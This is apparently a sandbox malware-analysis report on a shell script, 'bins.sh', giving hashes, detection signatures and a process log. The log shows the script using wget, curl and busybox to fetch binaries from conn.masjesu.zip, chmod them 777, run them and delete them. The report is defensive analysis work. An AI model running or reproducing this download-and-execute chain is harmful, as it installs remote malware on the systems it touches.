Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

7

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    11s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    10/12/2024, 12:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    76332caef0ad924adea8ad2d888817f1

  • SHA1

    a8474f314af7375aabfa4b9c94d039e27c8a4f87

  • SHA256

    5ba18bcbe3809ddafbbc1b1452b28070c84795f6254dcb2f4774942326290c2b

  • SHA512

    32bc8f9f68837d308bb57cca1de47d44b286fcff7835c439992400e7455f5a79afbb3be407a9166a65bc6a1ae1a654dd6fd59c0b2e68c67ceb2e4710a7742952

  • SSDEEP

    192:Hl4Akbp1TV77YpFUx3MI+4p1977YpFS3MIRfK:Hl4Akbp1TV77YpFUx3MI+4p1977YpFSW

Score
7/10
antivmdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:647
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:651
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • System Network Configuration Discovery
          PID:655
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:662
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • System Network Configuration Discovery
          PID:679
        • /bin/chmod
          chmod 777 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • File and Directory Permissions Modification
          PID:680
        • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          ./3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • Executes dropped EXE
          PID:682
        • /bin/rm
          rm 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
            PID:684
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
            2⤵
            • System Network Configuration Discovery
            PID:685
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • System Network Configuration Discovery
            PID:686

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          Filesize

          151KB

          MD5

          6c583043d91c55aa470c08c87058e917

          SHA1

          abf65a5b9bba69980278ad09356e53de8bb89439

          SHA256

          2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

          SHA512

          82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

          Download Submit